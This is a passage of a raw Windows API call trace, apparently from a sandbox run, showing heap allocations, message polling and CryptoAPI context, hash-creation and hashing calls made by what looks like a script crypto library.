lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.371] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.371] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0031.371] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.372] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.372] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.372] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.373] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.373] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.373] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.373] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.374] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.374] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.374] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.374] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.374] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.374] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.374] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.374] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.375] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.375] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.375] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.375] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.375] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.375] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.375] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.375] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0031.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.376] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.377] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.377] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.377] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.377] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.378] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 